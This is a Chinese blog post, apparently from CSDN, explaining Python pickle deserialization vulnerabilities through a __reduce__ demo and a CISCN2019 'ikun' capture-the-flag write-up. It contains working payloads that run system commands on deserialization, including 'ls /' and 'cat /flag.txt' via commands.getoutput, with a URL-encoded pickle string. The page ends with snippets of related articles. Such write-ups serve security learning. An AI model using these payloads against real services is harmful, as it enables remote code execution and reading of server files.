python pickle反序列化漏洞_Python Pickle反序列化漏洞

最新推荐文章于 2024-06-24 15:00:36 发布
最新推荐文章于 2024-06-24 15:00:36 发布
阅读量174 收藏
点赞数
文章标签: python pickle反序列化漏洞

命令执行#模仿Epicccal师傅的例子

import pickle

import os

class Test2(object):

def __reduce__(self):

#被调用函数的参数

cmd = "/usr/bin/id"

return (os.system,(cmd,))

if __name__ == "__main__":

test = Test2()

#执行序列化操作

result1 = pickle.dumps(test)

#执行反序列化操作

result2 = pickle.loads(result1)

# __reduce__()魔法方法的返回值:

# return(os.system,(cmd,))

# 1.满足返回一个元组,元组中有两个参数

# 2.第一个参数是被调用函数 : os.system()

# 3.第二个参数是一个元组:(cmd,),元组中被调用的参数 cmd

# 4. 因此序列化时被解析执行的代码是 os.system("/usr/bin/id")

题目训练

0x00:[CISCN2019 华北赛区 Day1 Web2]ikun

前面的步骤就不再详细描述了,这里直接从Pickle反序列化漏洞入手

在settings.py文件中发现提示,unicode解码一下

观察源码发现后门在Admin.py中

self.render('form.html', res=p, member=1)

这段代码的意思就是找到模板文件,进行渲染,从而显示页面

来观察一下form.html页面

说明传入的是可以直接进行回显的,而且可以将自定义的类进行序列化和反序列化,因此存在Pickle反序列化漏洞,那我们就可以构造一个通过pickle.dumps序列化的payload,从而被解析读取flag或其他信息。

构造payload可以使用方法__reduce__(self),先要获取的flag文件的位置,然后进行读取

但需要注意几点:

#os.system和os.popen

os.system 调用系统命令,完成后退出,返回结果是命令执行状态,一般是0

os.popen() 无法读取程序执行的返回值

这两个函数只有以print输出时才会回显,如果是以return返回的就不会显示结果。

查了资料发现

可以使用commands.getoutput()这个函数来进行代替,构造payload

# coding=utf8

import pickle

import urllib

import commands

class payload(object):

def __reduce__(self):

return (commands.getoutput,('ls /',))

a = payload()

print urllib.quote(pickle.dumps(a))

#ccommands%0Agetoutput%0Ap0%0A%28S%27ls%20/%27%0Ap1%0Atp2%0ARp3%0A.

发现flag.txt文件,那接下来就读取即可

return (commands.getoutput,('cat /flag.txt',))

weixin_39890289
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python Pickle反序列化漏洞
Lemon's blog
11-15 4595
前言: 刷题的时候做了一道[CISCN2019]ikun的题目,提示考察的知识点是Python Pickle,之前接触的都是有关PHP反序列化,这次就来好好学习一下Python Pickle反序列化漏洞。 基础知识 0x00:Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象
python pickle反序列化漏洞_python pickle从零构造反序列化攻击利用
weixin_39743414的博客
12-17 170
有一篇很好的文章对此讲的很详细https://xz.aliyun.com/t/7436#toc-0此外我对文章中的手写反序列化一块进行一些补充几道例题Code-Breaking:picklecode原payload:b'''cbuiltinsgetattrp0(cbuiltinsdictS'get'tRp1cbuiltinsglobals)Rp200g1(g2S'builtins'tRp30g0(...
python pickle反序列化漏洞_Python反序列化漏洞
weixin_39745013的博客
12-08 250
1、什么是序列化和php的序列化一样,是把string,字典,数组,类这些数据当作字节储存2、picklepickle.dumps()和pickle.loads() 分别是序列化和反序列化pickle.dump()和pickle.load是对文件的写入import picklex= 'cccccc'y = [1,2,3,4]z = {'name':'hzx','pass':'zzz'}print(...
详解python pickle中的反序列化漏洞
最新发布
公众号:该用户快成仙了
06-24 918
反序列化过程有漏洞:如果我们反序列化了一个不可信的数据源,那就可能引发反序列化攻击。攻击者可以在序列化的数据里嵌入恶意代码,当你反序列化这个数据时,这些恶意代码就会被执行,可能会导致数据泄露、系统崩溃,甚至让攻击者远程控制你的系统。Pickle模块是Python自带的,它主要用来序列化和反序列化Python对象。你可以用Pickle把任何Python对象(包括复杂的数据结构)保存成字节流,然后在需要的时候再加载回来。Pickle的工作原理Pickle的工作原理其实很简单。
PythonPickle/PyTorch反序列化漏洞
兴趣使然的创作者
02-28 1285
一个漏洞
Python Pickle 反序列化漏洞
qq_46001025的博客
10-05 246
需要注意的一点:注意:对于我们自己定义的class,如果直接以 data=‘aaa’ 的方式赋初值,则这个date不会被打包,解决方案是写一个__init__()方法。python反序列化漏洞的产生和php的魔术方法有异曲同工之处,在Python2中的 __reduce__() 方法,会在每次的反序列化开始或结束时调用。字节码,如果python有写入的权限,那么会生成一个 .pyc 的字节码文件,若没有那就再内存中生成字节码,程序结束后丢弃。(以下称为机器吧)维护了两个东西:栈区和存储区。
python pickle反序列化漏洞
weixin_43610673的博客
05-20 3032
前置知识 什么是pickle picklePython专用的一个进行序列化和反序列化的工具包,pickle能表示Python几乎所有的类型(包括自定义类型),由一系列opcode组成,模拟了类似堆栈的内存。 与PHP序列化或者JSON,这些以键值对形式存储序列化对象数据的不同,pickle 序列化(Python独有)是将一个 Python 对象及其所拥有的层次结构变成可以持久化储存的二进制数据,无法像JSON 一样直观阅读。在Python中,采用术语 封存 (pickling)和 解封 (unpickli
python反序列化漏洞 任意代码执行
01-20
这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码...
Python pickle模块实现对象序列化
09-18
`pickle.loads(str)`函数则是将序列化后的字节流`str`反序列化Python对象。在使用时,这个函数需要接收一个字节流字符串,并将其还原为最初序列化的对象。 在文件操作方面,`pickle.dump(obj, file)`函数用于直接...
Python Pickle 实现在同一个文件中序列化多个对象
09-18
# 进行更多对象的反序列化操作... ``` 当我们需要从文件中恢复对象时,我们同样打开文件,但这次是以二进制读取模式('rb')。通过逐一调用pickle.load()函数,我们可以按照当初写入的顺序,将存储在文件中的对象...
pavlova:基于数据类构建的python反序列化
02-05
“pavlova:基于数据类构建的python反序列化库”指出,pavlova是一个Python库,它的主要功能是处理数据的反序列化工作,特别强调了它利用Python的数据类(dataclasses)来实现这一功能。在Python中,数据类是一种...
Python序列化pickle模块使用详解
09-17
3. **`pickle.loads()`**: 反序列化字节序列,恢复为原始的Python对象。 4. **`pickle.load()`**: 从一个文件对象中加载并反序列化数据。 #### 四、支持的数据类型 `pickle`几乎可以处理所有的Python原生数据类型:...
python pickle漏洞
weixin_44687621的博客
07-27 615
python反序列化漏洞 1.使用pickle库对对象进行序列化和反序列化操作 json反序列化 import json dict={"admin":"123"} json_info = json.dumps(dict) print(str(type(json_info))+json_info) dict1=json.loads(json_info) print(str(type(dict1))) print(dict) pickle反序列化 import pickle class Test:
pickle反序列化漏洞基础知识与绕过简析
yj520400的博客
03-25 991
的结合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象).其中两个dump函数是把python对象转换为二进制对象的,两个load函数是把二进制对象转换为python对象的.在Python中,面向对象的思想和php是一致的,只是定义类的代码,调用类函数和类属性的方式和php不同.方法且该方法返回一个迭代器对象,那么这个对象就被认为是可迭代的。语言.也就是说在Python中几乎一切皆为对象.这也为我们的绕过提供的不小的便利.
pickle 反序列化漏洞浅析
Derait的博客
08-07 1052
pickle 反序列化漏洞浅析 Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象 dump 对象反序列化到文件对象,存入文件 loads 从bytes对象反序列化 load 对象反序列化,从文件中读取数据 先通过几个例子来看下这几个函数的作用: dump/load
Pythonpickle反序列化漏洞
Elite的博客
09-17 809
picklePython 的序列化模块,用于将 Python 对象转换为字节流,以便于存储或传输。反序列化是将字节流还原为对象的过程。然而,pickle 反序列化操作的不安全性在于,它可以执行在字节流中包含的任意代码,而不加以验证和限制。
python安全之Pickle反序列化漏洞学习。
Mrs_H的博客
10-28 2009
前言 写这篇文章的起因是两次遇到python pickle的题目都只做到了命令执行的程度,但都没有反弹shell。看别人的wp都是通过curl将flag拉到vps上的,怎么说呢,死于没有公网IP。虽然之前在做题的时候,照着网上的exp可以把自己的payload改个七七八八,但是说实话我距离真正意义上的“手撸”opcode还是有着一段距离。这篇文章主要还是通过我所遇到的pickle反序列化题目出发进行编写,当然也少不了pickle的原理部分。 正文 在正式开始这篇文章之前,我想先贴出一位大佬的文章Pion1e
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 897
详细讲解pickle
BUUCTF pickle反序列化漏洞
09-07
BUUCTF中的Pickle反序列化漏洞是指在该比赛的题目中存在通过反序列化攻击来执行任意代码的漏洞。具体来说,这个漏洞利用了Python中的pickle模块,pickle模块可以将对象序列化为字符串并保存到文件或通过网络传输。然后可以将这个字符串反序列化为原来的对象。这个过程中,如果不对反序列化的输入进行充分验证和过滤,攻击者可以构造恶意的pickle字符串,从而在反序列化的过程中执行任意代码。 在BUUCTF中,有一个题目叫做"Pickle Store",该题目利用了pickle模块的反序列化功能,并在反序列化的过程中执行了恶意代码。具体的攻击方法是,通过抓包获取到一个包含pickle字符串的session值,然后对这个字符串进行base64解码,并使用pickle模块的loads函数进行反序列化操作。这样就可以触发恶意代码的执行。 为了说明这个例子,作者提供了一个脚本来解析这个pickle字符串,首先使用base64解码得到原始字符串,然后使用pickle模块的loads函数进行反序列化操作,并最终执行恶意代码。这个例子展示了如何利用pickle模块的反序列化功能来执行任意代码。 在pickle模块中,还有一些其他的相关函数和方法可以帮助我们理解和分析pickle字符串的结构和内容。例如,pickletools模块提供了dis函数来反汇编pickle字符串,以及optimize函数来优化和简化pickle字符串的内容。 总结来说,BUUCTF中的Pickle反序列化漏洞是利用了pickle模块的反序列化功能来执行任意代码的漏洞。攻击者通过构造恶意的pickle字符串,可以在反序列化的过程中执行任意代码。为了解析和分析pickle字符串,可以使用pickle模块提供的函数和方法,如loads、pickletools.dis和pickletools.optimize。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值